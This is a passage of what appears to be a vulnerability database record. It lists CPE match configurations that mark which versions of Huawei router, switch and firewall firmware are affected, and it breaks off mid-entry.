huawei secospace_usg6600_firmware v500r001c00
huawei secospace_usg6600_firmware v500r001c20
huawei secospace_usg6600_firmware v500r001c30
huawei secospace_usg6600 -



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:ac6005_firmware:v200r006c10spc200:*:*:*:*:*:*:*",
                     matchCriteriaId: "CC214387-5475-4906-9DB0-37904F155D3E",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:ac6005:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "3681DA94-7184-4DC6-BD73-FCE2DB808F07",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:ac6605_firmware:v200r006c10spc200:*:*:*:*:*:*:*",
                     matchCriteriaId: "27E1DFD0-E93F-4603-A0BD-0A9BB47FEF83",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:ac6605:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "BA1E5AE5-EBB2-4E05-A3C7-E2CA54205FF7",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:ar1200_firmware:v200r005c10cp0582t:*:*:*:*:*:*:*",
                     matchCriteriaId: "1C83A896-DBC0-4BF1-8FE8-1A69229C0AFD",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar1200_firmware:v200r005c10hp0581t:*:*:*:*:*:*:*",
                     matchCriteriaId: "50006839-F220-4076-A90C-3DC021E318E4",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:ar1200_firmware:v200r005c20spc026t:*:*:*:*:*:*:*",
                     matchCriteriaId: "FC958A4F-DE8B-452C-B8BB-F905E8FCE81B",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:ar1200:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "D4BA4150-8CA8-48BF-9D45-ABC8AC710060",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:ar200_firmware:v200r005c20spc026t:*:*:*:*:*:*:*",
                     matchCriteriaId: "B375CF5B-F667-4C55-A0FA-A3341D07DC10",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:ar200:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2562CCF8-A4A7-4ACD-AA67-E3DB8B5ADA92",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:ar3200_firmware:v200r005c20spc026t:*:*:*:*:*:*:*",
                     matchCriteriaId: "41B21485-192C-43E2-9F3A-26248F6EE3D6",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:ar3200:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "9309E1AA-0C4E-422C-9307-A8DD0AE5D576",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:cloudengine_12800_firmware:v100r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "2AEB5929-1526-4910-BE22-07FCDDA06D0B",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:cloudengine_12800_firmware:v100r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "E58D7203-2EE3-412A-B39C-94D82B0BBB98",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:cloudengine_12800_firmware:v100r005c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "71EF4F82-092F-4D19-832B-A174F7D47477",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:cloudengine_12800_firmware:v100r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "3C2DACA5-0AA6-419B-AC6A-8CC19326758E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:cloudengine_12800_firmware:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "4492E892-7BE5-413A-AD53-2D39BD6626F6",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:cloudengine_12800:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "DE8A2875-0F7E-4790-A925-5999396B7578",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:cloudengine_5800_firmware:v100r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "90200F0F-FF1A-42D9-A4EF-8DD5F6DB6BA4",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:cloudengine_5800_firmware:v100r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "33B93684-6903-4A54-B631-15873D3D3744",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:cloudengine_5800_firmware:v100r005c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "9DFDAAAC-0585-406F-B547-FB71C5352209",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:cloudengine_5800_firmware:v100r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "916288E9-1DAB-40BE-9C29-3E8603FC0F02",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:cloudengine_5800_firmware:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "1573B4A5-A78B-4A17-8E1B-673A11D18221",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:cloudengine_5800:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "C8FD775C-F6B6-42B3-942E-EB4DC889B5F0",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:cloudengine_6800_firmware:v100r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "C42246DF-E736-4D98-AF73-3F5B731485D2",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:cloudengine_6800_firmware:v100r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "E31AD6C5-E687-47C9-8473-2486A6864128",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:cloudengine_6800_firmware:v100r005c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "40D8A10D-8B77-4F43-87A9-803ED9855AC9",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:cloudengine_6800_firmware:v100r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5E574B02-F89A-4D5C-B462-3AF56F1C0A57",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:cloudengine_6800_firmware:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "CD5BEF58-456D-4983-B1CA-A53CE5C4E24E",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:cloudengine_6800:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "19F2B3CC-12AD-466D-98F9-0C09C7C053CF",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:cloudengine_7800_firmware:v100r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "374AD269-B0F4-4534-ABAC-D08343B2CE42",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:cloudengine_7800_firmware:v100r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "828A6E23-962D-4A92-B14D-949B01489F35",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:cloudengine_7800_firmware:v100r005c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "B676B444-6128-4A04-B3E7-421F74FA9CD1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:cloudengine_7800_firmware:v100r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "BF6985E0-9375-4DE2-A879-AAACF923381C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:cloudengine_7800_firmware:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "B0FFE8C7-6E03-45ED-A581-779C75A5C432",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:cloudengine_7800:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "D05E858C-A3D8-4BF1-A750-CFD8C949ABF0",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:cloudengine_8800_firmware:v100r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "494F5272-28A3-4CE8-BB15-A7532C6DBA2E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:cloudengine_8800_firmware:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "397A2479-E943-401D-80AA-CD647E4AD451",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:cloudengine_8800:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "102751EB-C284-4983-BDFA-BFB634CB2CEC",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:e600_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "FE665712-0AF8-4671-9C3B-E2361B67A115",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:e600:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "021DF9A0-E7A9-4BB4-B8FA-49702D5F9E17",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s12700_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "7D81469B-EC6C-493D-B632-4DF821A1F304",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s12700_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "D6F2C4C7-3438-42B8-8999-C17E45C8CF49",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s12700_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "10CBC93B-5CF6-45BF-A90A-84B7693E27FD",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s12700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "BD4C5CC9-FD60-4C64-8F88-CFC71BBEA663",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s12700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "138C1E57-176C-46B1-9704-D9C8391CC802",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s1700_firmware:v100r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "293C2F9D-AD5B-4BEA-AA5F-42867723A3CB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s1700_firmware:v100r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "9EF14270-0AB9-425D-BB3C-53580F0E9568",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s1700_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "37009595-4D24-4679-93B7-3DCB6812E904",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s1700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "22FE26B5-C6D6-4A6C-8526-ED94F4F57C2C",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v100r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "1D875DDE-A38C-4C96-BE75-1CC5EAB7127B",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v100r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "C9D7CB90-6F2C-4012-8E57-F3B85F9D09C9",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v100r006c03:*:*:*:*:*:*:*",
                     matchCriteriaId: "FEFF6D05-BC82-4943-9D79-95CBEDD5CD2C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v100r006c05:*:*:*:*:*:*:*",
                     matchCriteriaId: "0B863F3A-38C5-4E36-8E71-713B12EE6889",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "1C6CC00C-1056-426B-9828-1A886F2C8D41",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v200r003c02:*:*:*:*:*:*:*",
                     matchCriteriaId: "2EEB211D-DF38-446D-8188-A1BA2B5055EE",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v200r003c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "F72A58FB-F7F5-4A4E-9B6A-F58A81B95040",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "F1C82DA6-8D95-45D2-B54C-CFE1AA9CC1F1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v200r005c01:*:*:*:*:*:*:*",
                     matchCriteriaId: "84857AE5-BCD7-4CD7-B1E0-EED6160189DD",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v200r005c02:*:*:*:*:*:*:*",
                     matchCriteriaId: "BEA81D41-E5C2-4788-A8EF-634B6273C454",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v200r005c03:*:*:*:*:*:*:*",
                     matchCriteriaId: "C47744E0-DAA5-41F5-8983-76457145029C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "1F982369-1A22-4F39-90AD-ABB824845774",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "79FA2FDA-DB2D-47D9-8017-0E5D4EC8D620",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2300_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "A40EFA43-E71F-464D-829C-8D4C60A57765",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s2300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "17566603-275F-4E6B-B5D9-4A716EEC03DC",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v100r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "39637990-2BCB-4429-B9FF-E24305D689B3",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v100r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "02401EA6-28B6-4424-B182-C20CD081FFD2",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v100r006c03:*:*:*:*:*:*:*",
                     matchCriteriaId: "3EA85312-3C8F-4F1F-8138-1A091C453193",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v100r006c05:*:*:*:*:*:*:*",
                     matchCriteriaId: "CA7D9357-D179-4B24-A073-17BA09AEC7E9",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "9888DCAA-118C-4091-8425-8FBEE3AAABC9",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v200r003c02:*:*:*:*:*:*:*",
                     matchCriteriaId: "35D75511-AFE2-4F56-BD35-38196442B369",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v200r003c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "FA3B89B7-1EA4-4597-BE48-67D0F79DB482",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "AED7DFC5-846F-4F90-91A8-13E9E805C9CF",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v200r005c01:*:*:*:*:*:*:*",
                     matchCriteriaId: "2EBB2862-B8A8-4723-AB8C-2F703204B4DA",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v200r005c02:*:*:*:*:*:*:*",
                     matchCriteriaId: "BC8A7075-264D-4AD7-92AE-10EADC4F2CFD",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v200r005c03:*:*:*:*:*:*:*",
                     matchCriteriaId: "9EA1D0A3-F955-4E7A-B52C-E9B483FB87DB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "193FCE7A-C793-446B-9C39-20597FA7BC70",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "E364889D-CDEE-4D8C-82E5-6D5BC3DD768A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s2700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "FB8FC67E-DFD3-482E-B7D6-17464885B8DC",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s2700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "DD2CD071-58E4-4061-8217-990453213470",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v100r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "0090CFFF-364F-436E-AA48-4AF6DCE852CD",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v100r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "8F5A65B0-66CC-456D-B356-FBF4B24E2EBA",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v100r006c01:*:*:*:*:*:*:*",
                     matchCriteriaId: "03E13B90-A465-4FBB-9D40-8EE380EB6CE9",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "7CD6E677-2031-4AC4-A5FE-DED60F789127",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r001c01:*:*:*:*:*:*:*",
                     matchCriteriaId: "B5BAE79D-445C-4234-B520-A00073750161",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r002c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "8FD118E1-317E-4903-A4D0-51EBCFA58C5B",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "FD601FFF-E623-4ADC-B286-D11B8004D7CF",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r003c02:*:*:*:*:*:*:*",
                     matchCriteriaId: "2D5A6744-9B7F-4FF4-BE1B-AB6E6249ECE3",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r003c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "DCA51B28-0130-4643-B45D-F2A74A08C9EF",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5EAEF900-7C8C-4569-B74B-A802F951CC47",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "58C2E728-E8F2-461D-A069-4BEC88B94FD0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "FD6B13D4-07F3-4CB5-8194-89781E685A78",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5454BC21-A04F-4B3D-8533-2414B6E1BC8C",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2CFEF08E-54C5-4D60-AFF0-37B00D6E2DDD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v100r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "45C60179-9ADC-4C50-8973-0767F295A963",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v100r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "A3D3E8A8-0D1E-40E7-8F94-81BACD476750",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v100r006c01:*:*:*:*:*:*:*",
                     matchCriteriaId: "4F89C2BA-E029-4D8E-93FB-F72322B21450",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "336AA440-AEF4-482B-A037-8976DC38BA1A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r001c01:*:*:*:*:*:*:*",
                     matchCriteriaId: "228D261C-DB88-4AEE-91D3-772DD28E4CDE",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r002c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "3B2DE9FE-5EC9-462E-86F0-EE772C944DFC",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "4907FBB8-5157-460D-9240-DD7D610C0FCC",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r003c02:*:*:*:*:*:*:*",
                     matchCriteriaId: "2898D6C5-77AB-4C1F-8134-B2DBD13EDB81",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r003c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "914C959A-3A3B-4B9C-BEF6-9EE129042C2D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "DCF23DAE-1215-41B2-88C5-4436D846266C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5973A534-F961-4A97-B20E-994BA28AFE29",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "40745A01-E5AC-4207-A34F-D8E7F7231F83",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "21FFF548-FBEF-468A-A8DE-1DB1B7C0B3AF",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "E22D3CFF-3353-4EE2-8933-84F395469D0D",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v100r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5B6B86F2-833E-4F41-A310-FC75A21D8241",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "7A680CFA-9C46-453D-A5BC-8ED1EBD45C2B",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r001c01:*:*:*:*:*:*:*",
                     matchCriteriaId: "CCEA87EC-B795-41BB-AC08-2E2F4D77BEF5",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r002c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "C9B67169-BF28-4493-89E9-9AAB895D9456",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5C330A14-C941-4B28-AA9C-B78A96A9011D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r003c02:*:*:*:*:*:*:*",
                     matchCriteriaId: "A73AC184-24AF-4DE8-BDFC-D646475C21F0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r003c10:*:*:*:*:*:*:*",
                     matchCriteriaId: "3F94C9F0-CBB9-4F5C-8D5C-8DD1B420C0BD",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "C6818ECD-730B-40D6-9108-B8540CC4BF1E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "939C73D9-E0E9-47A5-970E-6C84F5ECD2D7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s6300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AA3C8988-A1FC-4B04-9134-F2BDDADEAFB5",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
